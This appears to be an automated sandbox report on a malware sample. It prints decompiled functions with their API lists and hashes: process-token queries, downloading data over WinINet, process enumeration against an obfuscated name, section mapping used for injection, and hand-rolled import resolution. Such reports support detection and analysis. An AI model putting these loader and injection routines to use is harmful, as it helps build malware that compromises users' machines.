Opcode ID: f0b504c782afeb2443b6a20fa844bd2398f60c00792447d63e7de98c22893c16
Instruction ID: f737a6d35fb92f72919c174832cc974fbc3baf968c30601d1af8cfa83953b8fd
Opcode Fuzzy Hash: f0b504c782afeb2443b6a20fa844bd2398f60c00792447d63e7de98c22893c16
Instruction Fuzzy Hash: 2C311976A00205EFDB20EFA9DD85B6EFBF9FF48204B258469E515D7211EB31EE019B10

Uniqueness

Uniqueness Score: -1.00%

Function 00401E22, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401E22(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00401F3A();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x403104;
				_push(_t15 + 0x40405e);
				_push(_t15 + 0x404054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L00401F34();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x403108, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x00401e22
0x00401e2b
0x00401e2f
0x00401e35
0x00401e3a
0x00401e3f
0x00401e42
0x00401e45
0x00401e4a
0x00401e4b
0x00401e4e
0x00401e59
0x00401e60
0x00401e64
0x00401e66
0x00401e67
0x00401e6a
0x00401e6f
0x00401e79
0x00401e7b
0x00401e7b
0x00401e8f
0x00401e95
0x00401e99
0x00401ee9
0x00401e9b
0x00401ea4
0x00401eba
0x00401ec2
0x00401ed4
0x00401ed8
0x00000000
0x00000000
0x00401ec4
0x00401ec7
0x00401ecc
0x00401ece
0x00401ece
0x00401eaf
0x00401eb1
0x00401eda
0x00401edb
0x00401edb
0x00401ea4
0x00401ef1

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,0040143D,0000000A,?,?), ref: 00401E2F
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401E45
_snwprintf.NTDLL ref: 00401E6A
CreateFileMappingW.KERNELBASE(000000FF,00403108,00000004,00000000,?,?), ref: 00401E8F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040143D,0000000A,?), ref: 00401EA6
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00401EBA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040143D,0000000A,?), ref: 00401ED2
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040143D,0000000A), ref: 00401EDB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040143D,0000000A,?), ref: 00401EE3

Memory Dump Source

Source File: 00000000.00000002.509572364.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509624717.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.509656267.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: fca7e80b9ba9561c9709ad2fe4079cad74267bb47c00cdbe9b3e782023aa4d13
Instruction ID: a99f727ced56dbd8a4c2c124101b8a7b9c2e615e3b488e27424ce2f1f10c42e7
Opcode Fuzzy Hash: fca7e80b9ba9561c9709ad2fe4079cad74267bb47c00cdbe9b3e782023aa4d13
Instruction Fuzzy Hash: 2521A1B2900209BFD711AFA4DD88EAF37A9EB48354F114036FB05F72E0D6749905CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 03C49A0F, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E03C49A0F(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E03C41525(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E03C48B22(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x03c49a1c
0x03c49a1d
0x03c49a1e
0x03c49a1f
0x03c49a20
0x03c49a24
0x03c49a2b
0x03c49a3a
0x03c49a3d
0x03c49a40
0x03c49a47
0x03c49a4a
0x03c49a4d
0x03c49a50
0x03c49a53
0x03c49a5e
0x03c49a60
0x03c49a69
0x03c49a71
0x03c49a73
0x03c49a85
0x03c49a8f
0x03c49a93
0x03c49aa2
0x03c49aa6
0x03c49aaf
0x03c49ab7
0x03c49ab7
0x03c49ab9
0x03c49ab9
0x03c49ac1
0x03c49ac7
0x03c49acb
0x03c49acb
0x03c49ad6

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 03C49A56
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 03C49A69
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 03C49A85

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 03C49AA2
memcpy.NTDLL(00000000,00000000,0000001C), ref: 03C49AAF
NtClose.NTDLL(?), ref: 03C49AC1
NtClose.NTDLL(00000000), ref: 03C49ACB

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: d44ee49ed3d205e0d782b92485ee002b28bdc7b874af887896d4f8f7d2fc4c15
Instruction ID: 5171f2e37677e3d4fecd753a862daa84e0ba9f09aa75893181a3f49d37788567
Opcode Fuzzy Hash: d44ee49ed3d205e0d782b92485ee002b28bdc7b874af887896d4f8f7d2fc4c15
Instruction Fuzzy Hash: C221D8B6940228BFDB01EF95DC45EDEBFBDEF08750F108026FA05EA160D7719A449BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03C45988, Relevance: 9.1, APIs: 6, Instructions: 124
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E03C45988(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void _v20;
				void* __esi;
				void* _t30;
				int _t34;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				int _t45;
				long _t47;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_t34 = InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8); // executed
					if(_t34 != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x3c4d164(0, 1,  &_v12); // executed
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E03C41525(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
										if(_t45 != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E03C429C0( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E03C48B22(_v16);
										if(_t64 == 0) {
											_t47 = E03C448CB(_v12, _t69); // executed
											_t64 = _t47;
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E03C429C0( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E03C457DD(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}

0x03c45988
0x03c45989
0x03c4598f
0x03c4599a
0x03c4599a
0x03c4599c
0x03c4a556
0x03c4a55b
0x03c4a55d
0x03c4a56c
0x03c4a574
0x03c4a5a5
0x03c4a5aa
0x03c4a66d
0x03c4a5b0
0x03c4a5b7
0x03c4a5bf
0x03c4a66a
0x03c4a5c5
0x03c4a5ca
0x03c4a5cf
0x03c4a5d4
0x03c4a65c
0x03c4a5da
0x03c4a5da
0x03c4a5dc
0x03c4a5e2
0x03c4a5e3
0x03c4a5e3
0x03c4a5e6
0x03c4a5e9
0x03c4a5ef
0x03c4a600
0x03c4a608
0x00000000
0x00000000
0x03c4a610
0x03c4a618
0x03c4a624
0x03c4a628
0x03c4a62a
0x03c4a62f
0x00000000
0x00000000
0x03c4a62f
0x03c4a628
0x03c4a641
0x03c4a644
0x03c4a64b
0x03c4a651
0x03c4a656
0x03c4a656
0x00000000
0x03c4a631
0x03c4a631
0x03c4a636
0x03c4a638
0x03c4a639
0x03c4a63c
0x00000000
0x03c4a63c
0x00000000
0x03c4a636
0x03c4a5e3
0x03c4a65d
0x03c4a65d
0x03c4a663
0x03c4a663
0x03c4a5bf
0x03c4a576
0x03c4a57c
0x03c4a584
0x03c4a59d
0x03c4a59f
0x00000000
0x00000000
0x03c4a586
0x03c4a590
0x03c4a594
0x03c4a59a
0x00000000
0x03c4a59a
0x03c4a594
0x03c4a584
0x03c4a676
0x03c45991
0x03c45991
0x03c45998
0x03c459a3
0x00000000
0x00000000
0x00000000
0x03c45998

APIs

ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74E481D0), ref: 03C4A55D
InternetReadFile.WININET(?,?,00000004,?), ref: 03C4A56C
GetLastError.KERNEL32(?,?,?,00000000,74E481D0), ref: 03C4A576
ResetEvent.KERNEL32(?), ref: 03C4A5EF
InternetReadFile.WININET(?,?,00001000,?), ref: 03C4A600
GetLastError.KERNEL32 ref: 03C4A60A

Part of subcall function 03C457DD: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 03C457F4
Part of subcall function 03C457DD: SetEvent.KERNEL32(?), ref: 03C45804
Part of subcall function 03C457DD: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 03C45836
Part of subcall function 03C457DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 03C4585B
Part of subcall function 03C457DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 03C4587B

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
String ID:
API String ID: 2393427839-0
Opcode ID: 865364ac9f6be0be5e58e1f7af2671573aafc039cf76f1557729b666a5e43b40
Instruction ID: e21c1acdfdb2c8ae8137beeb9848de60e81c4f9c6a8c72cfcbe5e54c2bcf96ca
Opcode Fuzzy Hash: 865364ac9f6be0be5e58e1f7af2671573aafc039cf76f1557729b666a5e43b40
Instruction Fuzzy Hash: 8A41F53AA40600EFDF21EFA5DC44FAEB7BDAF84360F150568E552DB190EB30EA419B50

Uniqueness

Uniqueness Score: -1.00%

Function 03C48F1B, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E03C48F1B() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x3c4d2a8; // 0xcaa5a8
						_t2 = _t9 + 0x3c4ee34; // 0x73617661
						_push( &_v264);
						if( *0x3c4d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x03c48f26
0x03c48f2b
0x03c48f30
0x03c48f34
0x03c48f3e
0x03c48f6f
0x03c48f45
0x03c48f4a
0x03c48f57
0x03c48f60
0x03c48f77
0x03c48f62
0x03c48f6a
0x00000000
0x03c48f6a
0x03c48f78
0x03c48f79
0x00000000
0x03c48f79
0x00000000
0x03c48f73
0x03c48f7f
0x03c48f84

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03C48F2B
Process32First.KERNEL32(00000000,?), ref: 03C48F3E
Process32Next.KERNEL32(00000000,?), ref: 03C48F6A
CloseHandle.KERNEL32(00000000), ref: 03C48F79

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: d3072f629acc060cac80adce6b896d3e56fcc05ab072e6525eb4e4d065e4bce1
Instruction ID: a7405b4745b4ca31c1651e89a6864fdb6ca748ade9129d91821942a685c69606
Opcode Fuzzy Hash: d3072f629acc060cac80adce6b896d3e56fcc05ab072e6525eb4e4d065e4bce1
Instruction Fuzzy Hash: 60F0BB356013246BFB20F6668C48EEBB66DDBC5710F010191ED06D7104E731DF4586A5

Uniqueness

Uniqueness Score: -1.00%

Function 00401C90, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00401C90(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00401703(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x00401c99
0x00401ca0
0x00401ca1
0x00401ca2
0x00401ca3
0x00401ca4
0x00401cb5
0x00401cb9
0x00401ccd
0x00401cd0
0x00401cd3
0x00401cda
0x00401cdd
0x00401ce4
0x00401ce7
0x00401cea
0x00401ced
0x00401cf2
0x00401d2d
0x00401cf4
0x00401cf7
0x00401cfd
0x00401d02
0x00401d06
0x00401d24
0x00401d08
0x00401d0f
0x00401d1d
0x00401d1d
0x00401d06
0x00401d35

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,?), ref: 00401CED

Part of subcall function 00401703: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401D02,00000002,00000000,?,?,00000000,?,?,00401D02,00000002), ref: 00401730

memset.NTDLL ref: 00401D0F

Strings

@, xrefs: 00401CDD

Memory Dump Source

Source File: 00000000.00000002.509572364.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509624717.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.509656267.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: a0432050cf41c84421b6c7dc0a27d288bc4abc767ba214151e892c20fd89f3a1
Instruction ID: d00bf08d6aa1ecb95d0b181047dcd8cf727594324f693dbf64d6d2eb4fe127ad
Opcode Fuzzy Hash: a0432050cf41c84421b6c7dc0a27d288bc4abc767ba214151e892c20fd89f3a1
Instruction Fuzzy Hash: E521F9B5D0020DAFDB11DFA9C8849DEFBB9EF48354F10843AE615F3250D734AA458B64

Uniqueness

Uniqueness Score: -1.00%

Function 00401264, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401264(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x403100;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x00401264
0x0040126d
0x00401272
0x00401278
0x00401281
0x00401287
0x00401289
0x0040128c
0x00401291
0x00401298
0x00401298
0x0040129c
0x004012a2
0x004012a7
0x00000000
0x00000000
0x004012ad
0x004012b7
0x004012b9
0x004012bc
0x004012bf
0x004012c3
0x004012cb
0x004012cd
0x004012d0
0x00401338
0x00401338
0x0040133c
0x00000000
0x00000000
0x004012d5
0x004012db
0x004012dd
0x004012f0
0x004012f3
0x004012f3
0x004012f3
0x004012f7
0x004012df
0x004012df
0x004012e7
0x004012e9
0x00000000
0x00000000
0x00000000
0x00000000
0x004012e9
0x004012d7
0x004012d7
0x004012eb
0x004012eb
0x004012eb
0x004012fa
0x004012fd
0x004012ff
0x00401306
0x00401301
0x00401301
0x00401301
0x0040130e
0x00401314
0x00401316
0x00401346
0x00401318
0x00401318
0x0040131b
0x0040131d
0x00401325
0x00401325
0x0040132a
0x0040132c
0x00401333
0x00401335
0x00401335
0x00401335
0x00000000
0x00401335
0x00000000
0x00401316
0x004012c5
0x004012c5
0x004012c9
0x00000000
0x00000000
0x004012c9
0x00401349
0x00401349
0x00401350
0x00401355
0x00000000
0x00000000
0x0040135b
0x00401366
0x00000000
0x00401366
0x0040135d
0x0040135d
0x00401363
0x00000000
0x00401363
0x00401291
0x00401367
0x0040136c

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 0040129C
GetProcAddress.KERNEL32(?,00000000), ref: 0040130E

Memory Dump Source

Source File: 00000000.00000002.509572364.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509624717.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.509656267.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: b3be36541267bfaee00303300a6f938f46477752dc3d0cb2711c0485800f4ef2
Instruction ID: 08ebcf6dcd3e0bd4ed0640795f354858f0b5a52c81c2c864c780740fbe29bbaa
Opcode Fuzzy Hash: b3be36541267bfaee00303300a6f938f46477752dc3d0cb2711c0485800f4ef2
Instruction Fuzzy Hash: 74312771A002069BDB14CF99C894AAEB7F4BF08354B1440BED901FB3A0E778EA41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 03C45CD1, Relevance: 3.1, APIs: 2, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E03C45CD1(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E03C49E79(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x03c45cda
0x03c45ce1
0x03c45ce2
0x03c45ce3
0x03c45ce4
0x03c45ce5
0x03c45cf6
0x03c45cfa
0x03c45d0e
0x03c45d11
0x03c45d14
0x03c45d1b
0x03c45d1e
0x03c45d25
0x03c45d28
0x03c45d2b
0x03c45d2e
0x03c45d33
0x03c45d6e
0x03c45d35
0x03c45d38
0x03c45d3e
0x03c45d43
0x03c45d47
0x03c45d65
0x03c45d49
0x03c45d50
0x03c45d5e
0x03c45d5e
0x03c45d47
0x03c45d76

APIs

NtCreateSection.NTDLL(?,000F001F,?,00000001,?,08000000,00000000,74E04EE0,00000000,00000000,03C44A03), ref: 03C45D2E

Part of subcall function 03C49E79: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,03C45D43,00000002,00000000,?,?,00000000,?,?,03C45D43,00000000), ref: 03C49EA6

memset.NTDLL ref: 03C45D50

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510860852.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID:
API String ID: 2533685722-0
Opcode ID: e1b85d4906b46d5ec8863577dfd64c561fad0e0decfc25e493581635907b70ba
Instruction ID: ba7b748d3fb531c12cb3f9a6e707c8c8aa2b5fb6a01f16ef53ef26d0d9dde012
Opcode Fuzzy Hash: e1b85d4906b46d5ec8863577dfd64c561fad0e0decfc25e493581635907b70ba
Instruction Fuzzy Hash: 2F211DB5D00209AFDB11DFA9C8849EEFBB9EF48354F10846AE605F7210D730AA458F64

Uniqueness

Uniqueness Score: -1.00%

Function 03C49E79, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E03C49E79(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x03c49e8b
0x03c49e91
0x03c49e9f
0x03c49ea6
0x03c49eab
0x03c49eb1
0x00000000
0x03c49eb2
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,03C45D43,00000002,00000000,?,?,00000000,?,?,03C45D43,00000000), ref: 03C49EA6

Memory Dump Source

Source File: 00000000.00000002.510793788.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.510775875.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.510827950.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.510840198.0000000003C4D000.00000004.00020000.sdmp Download File
